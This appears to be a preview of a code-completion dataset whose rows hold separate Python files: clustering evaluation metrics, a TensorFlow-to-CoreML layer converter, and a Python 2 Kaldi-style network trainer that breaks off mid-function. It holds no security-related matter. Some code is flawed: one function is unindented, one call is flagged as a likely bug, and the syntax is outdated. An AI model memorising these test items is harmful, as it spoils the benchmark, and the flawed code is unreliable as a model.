gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
"""Unsupervised evaluation metrics."""
# Authors: Robert Layton <robertlayton@gmail.com>
# Arnaud Fouchet <foucheta@gmail.com>
# Thierry Guillemot <thierry.guillemot.work@gmail.com>
# License: BSD 3 clause
from __future__ import division
import functools
import numpy as np
from ...utils import check_random_state
from ...utils import check_X_y
from ...utils import safe_indexing
from ..pairwise import pairwise_distances_chunked
from ..pairwise import pairwise_distances
from ...preprocessing import LabelEncoder
def check_number_of_labels(n_labels, n_samples):
    """Validate that a clustering metric is defined for this label count.

    Parameters
    ----------
    n_labels : int
        Number of distinct cluster labels.
    n_samples : int
        Number of samples.

    Raises
    ------
    ValueError
        If ``n_labels`` is not in the open interval (1, n_samples).
    """
    if n_labels <= 1 or n_labels >= n_samples:
        raise ValueError("Number of labels is %d. Valid values are 2 "
                         "to n_samples - 1 (inclusive)" % n_labels)
def silhouette_score(X, labels, metric='euclidean', sample_size=None,
                     random_state=None, **kwds):
    """Compute the mean Silhouette Coefficient of all samples.

    The coefficient for each sample is ``(b - a) / max(a, b)`` where ``a``
    is the mean intra-cluster distance and ``b`` is the mean distance to the
    nearest cluster the sample does not belong to.  This function averages
    the per-sample values; use :func:`silhouette_samples` for the raw ones.

    Only defined when ``2 <= n_labels <= n_samples - 1``.  Best value is 1,
    worst is -1; values near 0 indicate overlapping clusters.

    Read more in the :ref:`User Guide <silhouette_coefficient>`.

    Parameters
    ----------
    X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
             [n_samples_a, n_features] otherwise
        Array of pairwise distances between samples, or a feature array.

    labels : array, shape = [n_samples]
        Predicted labels for each sample.

    metric : string, or callable
        The metric to use when calculating distance between instances in a
        feature array, as accepted by
        :func:`sklearn.metrics.pairwise.pairwise_distances`.  If X is the
        distance array itself, use ``metric="precomputed"``.

    sample_size : int or None
        If not None, the score is computed on a random subset of the data
        of this size.

    random_state : int, RandomState instance or None, optional (default=None)
        Controls the random subset selection; only used when
        ``sample_size is not None``.

    **kwds : optional keyword parameters
        Passed directly to the distance function.

    Returns
    -------
    silhouette : float
        Mean Silhouette Coefficient for all samples.

    References
    ----------
    .. [1] `Peter J. Rousseeuw (1987). "Silhouettes: a Graphical Aid to the
       Interpretation and Validation of Cluster Analysis". Computational
       and Applied Mathematics 20: 53-65.
       <http://www.sciencedirect.com/science/article/pii/0377042787901257>`_

    .. [2] `Wikipedia entry on the Silhouette Coefficient
       <https://en.wikipedia.org/wiki/Silhouette_(clustering)>`_
    """
    if sample_size is not None:
        X, labels = check_X_y(X, labels, accept_sparse=['csc', 'csr'])
        rng = check_random_state(random_state)
        # Draw sample_size indices without replacement.
        subset = rng.permutation(X.shape[0])[:sample_size]
        labels = labels[subset]
        if metric == "precomputed":
            # Sub-select rows and columns of the distance matrix.
            X = X[subset].T[subset].T
        else:
            X = X[subset]
    return np.mean(silhouette_samples(X, labels, metric=metric, **kwds))
def _silhouette_reduce(D_chunk, start, labels, label_freqs):
"""Accumulate silhouette statistics for vertical chunk of X
Parameters
----------
D_chunk : shape (n_chunk_samples, n_samples)
precomputed distances for a chunk
start : int
first index in chunk
labels : array, shape (n_samples,)
corresponding cluster labels, encoded as {0, ..., n_clusters-1}
label_freqs : array
distribution of cluster labels in ``labels``
"""
# accumulate distances from each sample to each cluster
clust_dists = np.zeros((len(D_chunk), len(label_freqs)),
dtype=D_chunk.dtype)
for i in range(len(D_chunk)):
clust_dists[i] += np.bincount(labels, weights=D_chunk[i],
minlength=len(label_freqs))
# intra_index selects intra-cluster distances within clust_dists
intra_index = (np.arange(len(D_chunk)), labels[start:start + len(D_chunk)])
# intra_clust_dists are averaged over cluster size outside this function
intra_clust_dists = clust_dists[intra_index]
# of the remaining distances we normalise and extract the minimum
clust_dists[intra_index] = np.inf
clust_dists /= label_freqs
inter_clust_dists = clust_dists.min(axis=1)
return intra_clust_dists, inter_clust_dists
def silhouette_samples(X, labels, metric='euclidean', **kwds):
    """Compute the Silhouette Coefficient for each sample.

    The coefficient for a sample is ``(b - a) / max(a, b)`` where ``a`` is
    its mean intra-cluster distance and ``b`` its mean nearest-cluster
    distance.  Only defined when ``2 <= n_labels <= n_samples - 1``.  Best
    value is 1, worst is -1; values near 0 indicate overlapping clusters.

    Read more in the :ref:`User Guide <silhouette_coefficient>`.

    Parameters
    ----------
    X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
             [n_samples_a, n_features] otherwise
        Array of pairwise distances between samples, or a feature array.

    labels : array, shape = [n_samples]
        label values for each sample

    metric : string, or callable
        The metric to use when calculating distance between instances in a
        feature array, as accepted by
        :func:`sklearn.metrics.pairwise.pairwise_distances`.  If X is the
        distance array itself, use "precomputed" as the metric.

    `**kwds` : optional keyword parameters
        Passed directly to the distance function.

    Returns
    -------
    silhouette : array, shape = [n_samples]
        Silhouette Coefficient for each samples.

    References
    ----------
    .. [1] `Peter J. Rousseeuw (1987). "Silhouettes: a Graphical Aid to the
       Interpretation and Validation of Cluster Analysis". Computational
       and Applied Mathematics 20: 53-65.
       <http://www.sciencedirect.com/science/article/pii/0377042787901257>`_

    .. [2] `Wikipedia entry on the Silhouette Coefficient
       <https://en.wikipedia.org/wiki/Silhouette_(clustering)>`_
    """
    X, labels = check_X_y(X, labels, accept_sparse=['csc', 'csr'])
    encoder = LabelEncoder()
    labels = encoder.fit_transform(labels)
    n_samples = len(labels)
    label_freqs = np.bincount(labels)
    check_number_of_labels(len(encoder.classes_), n_samples)

    kwds['metric'] = metric
    reduce_func = functools.partial(_silhouette_reduce, labels=labels,
                                    label_freqs=label_freqs)
    # Stream over chunks of the pairwise distance matrix; each chunk yields
    # (intra, inter) partial results which are concatenated afterwards.
    chunked = pairwise_distances_chunked(X, reduce_func=reduce_func, **kwds)
    intra_parts, inter_parts = zip(*chunked)
    intra_clust_dists = np.concatenate(intra_parts)
    inter_clust_dists = np.concatenate(inter_parts)

    # Average intra-cluster distance excludes the sample itself, hence the
    # (freq - 1) denominator; 'clip' keeps singleton clusters at 0.
    denom = (label_freqs - 1).take(labels, mode='clip')
    with np.errstate(divide="ignore", invalid="ignore"):
        intra_clust_dists /= denom
        sil_samples = inter_clust_dists - intra_clust_dists
        sil_samples /= np.maximum(intra_clust_dists, inter_clust_dists)
    # nan values are for clusters of size 1, and should be 0
    return np.nan_to_num(sil_samples)
def calinski_harabaz_score(X, labels):
    """Compute the Calinski and Harabaz score.

    Also known as the Variance Ratio Criterion: the ratio of the
    between-cluster dispersion to the within-cluster dispersion, scaled by
    the degrees of freedom.

    Read more in the :ref:`User Guide <calinski_harabaz_index>`.

    Parameters
    ----------
    X : array-like, shape (``n_samples``, ``n_features``)
        List of ``n_features``-dimensional data points. Each row corresponds
        to a single data point.

    labels : array-like, shape (``n_samples``,)
        Predicted labels for each sample.

    Returns
    -------
    score : float
        The resulting Calinski-Harabaz score.

    References
    ----------
    .. [1] `T. Calinski and J. Harabasz, 1974. "A dendrite method for cluster
       analysis". Communications in Statistics
       <http://www.tandfonline.com/doi/abs/10.1080/03610927408827101>`_
    """
    X, labels = check_X_y(X, labels)
    le = LabelEncoder()
    labels = le.fit_transform(labels)

    n_samples = X.shape[0]
    n_labels = len(le.classes_)
    check_number_of_labels(n_labels, n_samples)

    overall_mean = X.mean(axis=0)
    between_disp = 0.
    within_disp = 0.
    for k in range(n_labels):
        members = X[labels == k]
        centroid = members.mean(axis=0)
        between_disp += len(members) * ((centroid - overall_mean) ** 2).sum()
        within_disp += ((members - centroid) ** 2).sum()

    # A zero within-cluster dispersion (perfectly tight clusters) is
    # defined as a score of 1 to avoid division by zero.
    if within_disp == 0.:
        return 1.
    return (between_disp * (n_samples - n_labels)
            / (within_disp * (n_labels - 1.)))
def davies_bouldin_score(X, labels):
    """Computes the Davies-Bouldin score.

    The score is defined as the ratio of within-cluster distances to
    between-cluster distances; lower values indicate better clustering.

    Read more in the :ref:`User Guide <davies-bouldin_index>`.

    Parameters
    ----------
    X : array-like, shape (``n_samples``, ``n_features``)
        List of ``n_features``-dimensional data points. Each row corresponds
        to a single data point.

    labels : array-like, shape (``n_samples``,)
        Predicted labels for each sample.

    Returns
    -------
    score: float
        The resulting Davies-Bouldin score.

    References
    ----------
    .. [1] Davies, David L.; Bouldin, Donald W. (1979).
       `"A Cluster Separation Measure"
       <http://ieeexplore.ieee.org/document/4766909>`__.
       IEEE Transactions on Pattern Analysis and Machine Intelligence.
       PAMI-1 (2): 224-227
    """
    X, labels = check_X_y(X, labels)
    le = LabelEncoder()
    labels = le.fit_transform(labels)
    n_samples, _ = X.shape
    n_labels = len(le.classes_)
    check_number_of_labels(n_labels, n_samples)

    intra_dists = np.zeros(n_labels)
    # BUGFIX: np.float is a removed alias for the builtin float (deprecated
    # NumPy 1.20, removed 1.24); use the builtin directly.  Also prefer
    # X.shape[1] over len(X[0]), which would fail on sparse rows.
    centroids = np.zeros((n_labels, X.shape[1]), dtype=float)
    for k in range(n_labels):
        cluster_k = safe_indexing(X, labels == k)
        centroid = cluster_k.mean(axis=0)
        centroids[k] = centroid
        # Mean distance of cluster members to their centroid.
        intra_dists[k] = np.average(pairwise_distances(
            cluster_k, [centroid]))

    centroid_distances = pairwise_distances(centroids)

    if np.allclose(intra_dists, 0) or np.allclose(centroid_distances, 0):
        return 0.0

    score = (intra_dists[:, None] + intra_dists) / centroid_distances
    # Diagonal entries divide by zero -> inf; mask them out of the max.
    score[score == np.inf] = np.nan
    return np.mean(np.nanmax(score, axis=1))
| |
from tensorflow.python.util import compat
import numpy as np
from ._interpret_shapes import _interpret_shape as interpret_shape
from ._layers_common import identity, make_tensor, skip
def _remove_beginning_unit_dimensions(in_tuple):
for i, value in enumerate(in_tuple):
if value == 1:
continue
else:
return in_tuple[i:]
def _add_const(context, name, x, output_name, shape=None):
    """Add a constant tensor ``x`` to the CoreML graph as a load_constant layer.

    CoreML load_constant layers are rank-3 (C, H, W), so a rank-4 constant
    with a non-unit sequence dimension needs extra permute layers.  Already
    loaded constants (tracked in ``context.load_constants_mlmodel``) are
    skipped.  If ``shape`` is given it is used verbatim; otherwise the shape
    is derived via DFS shape inference or from ``x.shape``.
    """
    if output_name in context.load_constants_mlmodel:
        # Constant already emitted for this output; nothing to do.
        return
    if shape is not None:
        context.builder.add_load_constant(name, output_name, x, shape)
        context.load_constants_mlmodel[output_name] = True
        return
    context.load_constants_mlmodel[output_name] = True
    if context.use_dfs_shape_infer:
        status = interpret_shape(output_name, context)
    else:
        status = False
    if status:
        # Shape inference succeeded: use the inferred rank-4 shape.
        rank_4_shape = context.shape_dict_rank_4[output_name]
        # TODO - Interpreting 1st dimension as seq. in this case instead of batch
        seq, h, w, c = rank_4_shape
        x = np.reshape(x, (seq, h, w, c))
        #first check the simple case: seq. dimension is 1
        if seq == 1:
            shape = [c, h, w] # (C, H, W)
            x = np.transpose(x, [0, 3, 1, 2])
            context.builder.add_load_constant(name, output_name, x, shape)
        #when sequence dimension is not 1, we need some permute layers as well
        #since CoreML only allows loading constant of rank-3: [C,H,W])
        else:
            assert c == 1 or h == 1 or w == 1, \
                'Add constant: cannot add a constant in which all the dimensions ' \
                '(Seq, C, H, W) are of non-unit size'
            # Load the constant with seq folded into the unit axis, then
            # permute it back so seq ends up in the sequence position.
            if c == 1: #swap seq. and C
                x = np.transpose(x, [3, 0, 1, 2]) #(S,H,W,C) --> (C,S,H,W)
                context.builder.add_load_constant(
                    name + '_pre_permute', output_name + '_pre_permute', x, [seq, h, w])
                context.builder.add_permute(
                    output_name, (1, 0, 2, 3), output_name + '_pre_permute', output_name)
            elif h == 1: #swap seq. and H
                x = np.transpose(x, [1, 3, 0, 2]) #(S,H,W,C) --> (H,C,S,W)
                context.builder.add_load_constant(
                    name + '_pre_permute', output_name + '_pre_permute', x, [c, seq, w])
                context.builder.add_permute(
                    output_name, (2, 1, 0, 3), output_name + '_pre_permute', output_name)
            else: # w == 1, swap seq. and W
                x = np.transpose(x, [2, 3, 1, 0]) #(S,H,W,C) --> (W,C,H,S)
                context.builder.add_load_constant(
                    name + '_pre_permute', output_name + '_pre_permute', x, [c, h, seq])
                context.builder.add_permute(
                    output_name, (3, 1, 2, 0), output_name + '_pre_permute', output_name)
    else: #Static shape mapping
        # No inferred shape: map x.shape (rank 0-4) onto CoreML's (C, H, W).
        shape = list(x.shape)
        assert len(shape) < 5, 'Const blob shape is more than rank 4'
        if len(shape) == 0:
            shape = [1, 1, 1] #(1,1,1)
        elif len(shape) == 1:
            shape = [shape[0], 1, 1] #(C,1,1)
        elif len(shape) == 2:
            shape = [shape[1], 1, shape[0]] # HACK: (W,C) ---> (C,1,W) . Style transfer matrices are (W,C)
            x = np.transpose(x, [1, 0])
        elif len(shape) == 3:
            shape = [shape[2], shape[0], shape[1]] # (H,W,C) ---> (C,H,W)
            x = np.transpose(x, [2, 0, 1])
        elif len(shape) == 4:
            assert shape[0] == 1, 'Add Constant: Batch dimension must be 1'
            shape = [shape[3], shape[1], shape[2]] #(B,H,W,C) ---> (C,H,W)
            x = x[0, :, :, :] #(H,W,C)
            x = np.transpose(x, [2, 0, 1])
        context.builder.add_load_constant(name, output_name, x, shape)
def _add_concat(op, context):
    """Translate a TF Concat/ConcatV2 op into CoreML CONCAT layer(s).

    CoreML concatenates natively only along the channel axis, so height or
    width concatenations are implemented as permute -> concat -> permute.
    The TF axis operand is taken from the first input (Concat) or the last
    input (ConcatV2) and remapped onto CoreML's (B, H, W, C) axis numbering.
    """
    output_name = compat.as_str_any(op.outputs[0].name)
    output_shape = context.shape_dict[output_name]
    axis = 3 #3 -> 'Channel', 2 -> 'Width', 1 -> 'Height
    if op.type == 'Concat':
        # Concat: axis is the FIRST input; remaining inputs are tensors.
        axis_name = compat.as_str_any(op.inputs[0].name)
        axis = context.consts[axis_name]
        input_names = []
        for i, input in enumerate(op.inputs):
            if i == 0:
                continue
            input_names.append(compat.as_str_any(input.name))
            make_tensor(input, context)
    if op.type == 'ConcatV2':
        # ConcatV2: axis is the LAST input.
        axis_name = compat.as_str_any(op.inputs[-1].name)
        axis = context.consts[axis_name]
        input_names = []
        for i, input in enumerate(op.inputs):
            if i == len(op.inputs) - 1:
                continue
            input_names.append(compat.as_str_any(input.name))
            make_tensor(input, context)
    if context.use_dfs_shape_infer:
        status = interpret_shape(output_name, context)
    else:
        status = False
    if status:
        # Shape inference labeled the dims; map the label at `axis` to the
        # CoreML axis number.
        labeled_shape = context.dim_labels[output_name]
        if labeled_shape[axis] == 'C':
            axis = 3
        elif labeled_shape[axis] == 'H':
            axis = 1
        elif labeled_shape[axis] == 'W':
            axis = 2
        else:
            assert False, 'Concatenation supported only along channel, height or '\
                'width dimensions'
    else:
        # Fallback heuristics based on output rank.
        if len(output_shape) == 4:
            assert axis in [1, 2, 3], 'Concat axis case not handled'
        elif len(output_shape) == 3:
            axis += 1
        elif len(output_shape) == 1:
            axis = 3
        elif len(output_shape) == 2 and axis == 1:
            #interpret this as (Batch,Channels) scenario
            axis = 3
        else:
            assert False, ('Concat axis case not handled. output shape = {}, axis = {}'.format(str(output_shape), axis))
    # Temporary workaround for fixing bugs on certain devices.
    # TODO: remove this in future
    # If concat's input is coming from another pool/concat: insert a linear activation layer,
    # if it hasn't been inserted already
    coreml_layers = context.builder.nn_spec.layers
    coreml_outputs = dict()
    for layer in coreml_layers:
        for out in layer.output:
            coreml_outputs[out] = True
    for layer in coreml_layers:
        if layer.WhichOneof('layer') in ['concat', 'pooling']:
            for i, inp in enumerate(input_names):
                if layer.output[0] == inp:
                    out = inp + '__linear_activation'
                    if out not in coreml_outputs:
                        context.builder.add_activation(out, 'LINEAR', inp, out, [1.0, 0])
                    input_names[i] = out
    if axis == 3: #concatenate along channel axis
        context.builder.add_elementwise(
            output_name, input_names, output_name, 'CONCAT')
    elif axis == 2: #concatenate along width axis
        # Swap W and C, concat along C, swap back.
        blob_postfix = '_swap_W_C_'
        transpose_order = (0, 3, 2, 1)
        inputs_permuted = []
        for i, input_name in enumerate(input_names):
            context.builder.add_permute(
                output_name + '_' + str(i), transpose_order,
                input_name, input_name + blob_postfix + str(i))
            inputs_permuted.append(input_name + blob_postfix + str(i))
        context.builder.add_elementwise(
            output_name + '_concat', inputs_permuted, output_name + '_concat', 'CONCAT')
        context.builder.add_permute(
            output_name, transpose_order, output_name + '_concat', output_name)
    elif axis == 1: #concatenate along height axis
        # Swap H and C, concat along C, swap back.
        inputs_permuted = []
        for i, input_name in enumerate(input_names):
            context.builder.add_permute(
                output_name + '_' + str(i), (0, 2, 1, 3),
                input_name, input_name + '_swap_H_C_' + str(i))
            inputs_permuted.append(input_name + '_swap_H_C_' + str(i))
        context.builder.add_elementwise(
            output_name + '_concat', inputs_permuted, output_name + '_concat', 'CONCAT')
        context.builder.add_permute(
            output_name, (0, 2, 1, 3), output_name + '_concat', output_name)
    else:
        assert False, 'Concat axis case not handled'
    context.translated[output_name] = True
# Only the case when the splits are equal and along the channel axis is handled
def _add_split(op, context):
    """Translate a TF Split op into a CoreML split layer.

    Only equal-sized splits are supported; a single-output split whose
    shape matches the input is treated as a no-op and skipped.
    """
    tensor = op.inputs[1]
    input_name = compat.as_str_any(tensor.name)
    input_shape = context.shape_dict[input_name]
    make_tensor(tensor, context)

    # Degenerate split: one output, same shape -> pass the input through.
    if len(op.outputs) == 1 and input_shape == context.shape_dict[op.outputs[0].name]:
        skip(op, context, input_name, input_id=1 if op.type == 'Split' else 0)
        return

    # Collect output names and verify all splits share one shape.
    output_names = []
    common_out_shape = None
    for out in op.outputs:
        out_name = compat.as_str_any(out.name)
        output_names.append(out_name)
        out_shape = context.shape_dict[out_name]
        if common_out_shape is None:
            common_out_shape = out_shape
        elif common_out_shape != out_shape:
            assert False, 'Split op case not handled. Only equal splitting convertible to CoreML.'

    # The split must be along the last (channel) axis: all leading dims of
    # the outputs must match the input.
    rank4_ok = (len(input_shape) == 4 and len(common_out_shape) == 4
                and common_out_shape[:3] == input_shape[:3])
    rank3_ok = (len(input_shape) == 3 and len(common_out_shape) == 3
                and common_out_shape[:2] == input_shape[:2])
    if not (rank4_ok or rank3_ok):
        raise ValueError('Split op case not handled. Input shape = {}, output shape = {}'.format(str(input_shape), str(common_out_shape)))

    context.builder.add_split(output_names[0], input_name, output_names)
    for out_name in output_names:
        context.translated[out_name] = True
def _add_reshape(op, context):
    """Translate a TF Reshape op into a CoreML reshape layer.

    Handles several special cases before emitting a layer: squeeze/expand
    reshapes are skipped, reshape-softmax-reshape round trips are collapsed,
    and a following Squeeze is folded into the target shape.  The final TF
    target shape (rank 1-4) is remapped to CoreML's (S/B, C, H, W) layout.
    """
    input_name = compat.as_str_any(op.inputs[0].name)
    output_name = compat.as_str_any(op.outputs[0].name)
    #First make sure the the input blob exists in the CoreML graph
    input_name = make_tensor(op.inputs[0], context)
    input_shape = context.shape_dict[input_name]
    target_shape = context.shape_dict[output_name]
    # If the shapes only differ by leading unit dims, this reshape is a
    # squeeze/expand_dims and can be skipped entirely.
    squeezed_input_shape = _remove_beginning_unit_dimensions(input_shape)
    squeezed_output_shape = _remove_beginning_unit_dimensions(target_shape)
    if squeezed_input_shape == squeezed_output_shape:
        # reshape is either squeeze or expand_dim
        skip(op, context)
        return
    if context.use_dfs_shape_infer:
        status = interpret_shape(output_name, context)
    else:
        status = False
    if status:
        # Shape inference gave a rank-4 shape; skip if it matches the input.
        target_shape = context.shape_dict_rank_4[output_name]
        if interpret_shape(input_name, context):
            input_shape_rank_4 = context.shape_dict_rank_4[input_name]
            if input_shape_rank_4 == target_shape:
                skip(op, context)
                return
    # When reshape is immediately followed by squeeze
    if len(op.outputs) > 0 and len(op.outputs[0].consumers()) > 0 and \
        op.outputs[0].consumers()[0].type == 'Squeeze':
        squeezed_output_name = compat.as_str_any(
            op.outputs[0].consumers()[0].outputs[0].name)
        target_shape = context.shape_dict[squeezed_output_name]
    # check for the pattern "reshape-softmax-reshape", it is common towards the end of graphs
    if len(context.blob_graph[output_name]) == 1:
        next_op = context.blob_graph[output_name][0]
        if next_op.type == 'Softmax':
            output_softmax = next_op.outputs[0].name
            if len(context.blob_graph[output_softmax]) == 1:
                next_softmax_op = context.blob_graph[output_softmax][0]
                if next_softmax_op.type == 'Reshape':
                    final_shape = context.shape_dict[next_softmax_op.outputs[0].name]
                    if input_shape == final_shape:
                        # Round trip back to the input shape: drop both
                        # reshapes, unless either blob is a graph output.
                        if output_name not in context.output_names and \
                            output_softmax not in context.output_names:
                            skip(op, context)
                            context.skip_ops.append(next_softmax_op.name)
                            return
    # TODO - these cases of reshape are just for mobilenet and stylenet:
    # if target_shape == (1,X) ----> new_shape = (X,1,1)
    # if target_shape == (X,1) -----> new_shape = (1,1,X)
    assert len(target_shape) in [1, 2, 3, 4], (
        'Reshape: Currently only supported if target shape is rank 2, 3 or 4')
    # mode: 0 = channel-first interpretation, 1 = channel-last (see CoreML
    # reshape layer semantics).
    mode = 0
    if len(target_shape) == 2:
        if len(input_shape) == 4 and input_shape[0] == 1 and \
            target_shape[0] != 1 and target_shape[1] != 1:
            # (1,H,W,C) -> (H*W, C)
            new_shape = (1, target_shape[1], target_shape[0], 1)
        elif target_shape[1] != 1: #(1,X)
            new_shape = (1, target_shape[1], 1, 1)
            if len(input_shape) == 4 or len(input_shape) == 3:
                # (N,H,W,C) --> (1,C) or (N,S,C) --> (N,1,W,C)
                mode = 1
        else:
            new_shape = (1, 1, 1, target_shape[0])
    elif len(target_shape) == 3:
        # Target shape is [H,W,C] --> [1, C, H, W]
        new_shape = (1, target_shape[2], target_shape[0], target_shape[1])
        mode = 1
    elif len(target_shape) == 4:
        new_shape = (
            target_shape[0], target_shape[3], target_shape[1], target_shape[2])
        mode = 1
    elif len(target_shape) == 1:
        new_shape = (1, target_shape[0], 1, 1)
        mode = 1
    else:
        raise TypeError('Reshape case not handled')
    context.builder.add_reshape(
        output_name, input_name, output_name, new_shape, mode)
    context.translated[output_name] = True
    if op.type == 'QuantizedReshape':
        # QuantizedReshape carries min/max range outputs as well.
        context.translated[op.outputs[1].name] = True
        context.translated[op.outputs[2].name] = True
def _add_reduce(op, context, mode):
    """Translate a TF reduction op (Sum/Mean/Max/...) into CoreML reduce.

    The TF reduction axes are mapped to CoreML axis strings ('C', 'H', 'W',
    'HW', 'CHW').  A reduction along the sequence axis ('S') has no native
    CoreML equivalent, so it is emitted as permute -> reduce(C) -> permute.
    """
    input_name = compat.as_str_any(op.inputs[0].name)
    output_name = compat.as_str_any(op.outputs[0].name)
    if op.inputs[1].name in context.consts:
        axis_ind = context.consts[op.inputs[1].name]
    else:
        # NOTE(review): calling context.session(...) directly looks like it
        # should be context.session.run(...) — confirm against the Context
        # class before relying on this fallback path.
        axis_ind = context.session(op.inputs[1].name, feed_dict=context.input_feed_dict)
    input_shape = context.shape_dict[input_name]
    output_shape = context.shape_dict[output_name]
    # skip if output shape is same as input shape: in that case its a dummy operation
    if input_shape == output_shape:
        skip(op, context)
        return
    if context.use_dfs_shape_infer:
        status = interpret_shape(input_name, context)
    else:
        status = False
    # convert axis_ind into a list
    if axis_ind is None:
        # No axes given: reduce over everything.
        axis = 'CHW'
        context.builder.add_reduce(output_name, input_name, output_name, axis, mode)
        context.translated[output_name] = True
        return
    elif isinstance(axis_ind, int) or isinstance(axis_ind, np.int32) or isinstance(axis_ind, np.integer):
        # Single axis: normalise negative indices and wrap in a list.
        # (np.integer covers the removed np.int alias and all int widths.)
        axis_ind = (len(input_shape) + axis_ind) if axis_ind < 0 else axis_ind
        axis_ind = [axis_ind]
    elif isinstance(axis_ind, np.ndarray):
        axis_ind = axis_ind.tolist()
    # Determine reduction axis labels
    axis = ''
    if status:
        # Use the inferred dimension labels; unit dims need no reduction.
        labeled_shape = context.dim_labels[input_name]
        for i in axis_ind:
            if input_shape[i] != 1:
                axis += labeled_shape[i]
        axis = ''.join(sorted(axis))
    else:
        # check for all cases: len(input_shape) = 1,2,3,4
        if len(input_shape) == len(axis_ind):
            axis = 'CHW'
        elif len(input_shape) == 1:
            axis = 'C'
        elif len(input_shape) == 2:
            if len(axis_ind) == 1 and axis_ind[0] == 1: axis = 'C'
            if len(axis_ind) == 1 and axis_ind[0] == 0: axis = 'W' # TODO - Handle it more robustly. Only works for stylenet. (W,C)--->(1,C)
        elif len(input_shape) == 3:
            for ind in [['H', 'W', 'C'][i] for i in axis_ind]:
                axis += ind
            axis = ''.join(sorted(axis))
        elif len(input_shape) == 4:
            for ind in [['B', 'H', 'W', 'C'][i] for i in axis_ind]:
                axis += ind
            axis = ''.join(sorted(axis))
            if len(axis) > 1 and axis[0] == 'B':
                # Batch is always 1 at inference time: drop it.
                axis = axis[1:]
    if len(axis) == 0:
        raise NotImplementedError(
            'Reduce axis %s for input shape %s, output shape %s, not handled currently' %(str(axis_ind), str(input_shape), str(output_shape)))
    else:
        # BUGFIX: str.replace returns a new string; the original discarded
        # the result, so a batch-only reduction ('B') never became 'S' and
        # the assert below always fired for that case.
        axis = axis.replace('B', 'S')
    assert axis in ['S', 'C', 'H', 'W', 'CHW', 'HW'], (
        'Axis value %s not supported. '
        'Reduction supported along C, H, W, HW, CHW dimensions only.' % axis)
    # The simple case; reduction along non sequence axis
    if axis != 'S':
        context.builder.add_reduce(output_name, input_name, output_name, axis, mode)
    # Need to permute, reduce and then permute back
    else:
        context.builder.add_permute(
            output_name + '_swap_Seq_C', (1, 0, 2, 3), input_name, output_name + '_swap_Seq_C')
        context.builder.add_reduce(
            output_name + '_pre_permute', output_name + '_swap_Seq_C',
            output_name + '_pre_permute', 'C', mode)
        context.builder.add_permute(
            output_name, (1, 0, 2, 3), output_name + '_pre_permute', output_name)
    context.translated[output_name] = True
| |
'''@file nnet.py
contains the functionality for a Kaldi style neural network'''
import shutil
import os
import itertools
import numpy as np
import tensorflow as tf
import classifiers.activation
from classifiers.dnn import DNN
from trainer import CrossEnthropyTrainer
from decoder import Decoder
class Nnet(object):
'''a class for a neural network that can be used together with Kaldi'''
def __init__(self, conf, input_dim, num_labels):
'''
Nnet constructor
Args:
conf: nnet configuration
input_dim: network input dimension
num_labels: number of target labels
'''
#get nnet structure configs
self.conf = dict(conf.items('nnet'))
#define location to save neural nets
self.conf['savedir'] = (conf.get('directories', 'expdir')
+ '/' + self.conf['name'])
if not os.path.isdir(self.conf['savedir']):
os.mkdir(self.conf['savedir'])
if not os.path.isdir(self.conf['savedir'] + '/training'):
os.mkdir(self.conf['savedir'] + '/training')
#compute the input_dimension of the spliced features
self.input_dim = input_dim * (2*int(self.conf['context_width']) + 1)
if self.conf['batch_norm'] == 'True':
activation = classifiers.activation.Batchnorm(None)
else:
activation = None
#create the activation function
if self.conf['nonlin'] == 'relu':
activation = classifiers.activation.TfActivation(activation,
tf.nn.relu)
elif self.conf['nonlin'] == 'sigmoid':
activation = classifiers.activation.TfActivation(activation,
tf.nn.sigmoid)
elif self.conf['nonlin'] == 'tanh':
activation = classifiers.activation.TfActivation(activation,
tf.nn.tanh)
elif self.conf['nonlin'] == 'linear':
activation = classifiers.activation.TfActivation(activation,
lambda(x): x)
else:
raise Exception('unkown nonlinearity')
if self.conf['l2_norm'] == 'True':
activation = classifiers.activation.L2Norm(activation)
if float(self.conf['dropout']) < 1:
activation = classifiers.activation.Dropout(
activation, float(self.conf['dropout']))
#create a DNN
self.dnn = DNN(
num_labels, int(self.conf['num_hidden_layers']),
int(self.conf['num_hidden_units']), activation,
int(self.conf['add_layer_period']) > 0)
def train(self, dispenser):
'''
Train the neural network
Args:
dispenser: a batchdispenser for training
'''
#get the validation set
val_data, val_labels = zip(
*[dispenser.get_batch()
for _ in range(int(self.conf['valid_batches']))])
val_data = list(itertools.chain.from_iterable(val_data))
val_labels = list(itertools.chain.from_iterable(val_labels))
dispenser.split()
#compute the total number of steps
num_steps = int(dispenser.num_batches *int(self.conf['num_epochs']))
#set the step to the saving point that is closest to the starting step
step = (int(self.conf['starting_step'])
- int(self.conf['starting_step'])
% int(self.conf['check_freq']))
#go to the point in the database where the training was at checkpoint
for _ in range(step):
dispenser.skip_batch()
if self.conf['numutterances_per_minibatch'] == '-1':
numutterances_per_minibatch = dispenser.size
else:
numutterances_per_minibatch = int(
self.conf['numutterances_per_minibatch'])
#put the DNN in a training environment
trainer = CrossEnthropyTrainer(
self.dnn, self.input_dim, dispenser.max_input_length,
dispenser.max_target_length,
float(self.conf['initial_learning_rate']),
float(self.conf['learning_rate_decay']),
num_steps, numutterances_per_minibatch)
#start the visualization if it is requested
if self.conf['visualise'] == 'True':
if os.path.isdir(self.conf['savedir'] + '/logdir'):
shutil.rmtree(self.conf['savedir'] + '/logdir')
trainer.start_visualization(self.conf['savedir'] + '/logdir')
#start a tensorflow session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True #pylint: disable=E1101
with tf.Session(graph=trainer.graph, config=config):
#initialise the trainer
trainer.initialize()
#load the neural net if the starting step is not 0
if step > 0:
trainer.restore_trainer(self.conf['savedir']
+ '/training/step' + str(step))
#do a validation step
if val_data is not None:
validation_loss = trainer.evaluate(val_data, val_labels)
print 'validation loss at step %d: %f' % (step, validation_loss)
validation_step = step
trainer.save_trainer(self.conf['savedir']
+ '/training/validated')
num_retries = 0
#start the training iteration
while step < num_steps:
#get a batch of data
batch_data, batch_labels = dispenser.get_batch()
#update the model
loss = trainer.update(batch_data, batch_labels)
#print the progress
print 'step %d/%d loss: %f' %(step, num_steps, loss)
#increment the step
step += 1
#validate the model if required
if (step%int(self.conf['valid_frequency']) == 0
and val_data is not None):
current_loss = trainer.evaluate(val_data, val_labels)
print 'validation loss at step %d: %f' %(step, current_loss)
if self.conf['valid_adapt'] == 'True':
#if the loss increased, half the learning rate and go
#back to the previous validation step
if current_loss > validation_loss:
#go back in the dispenser
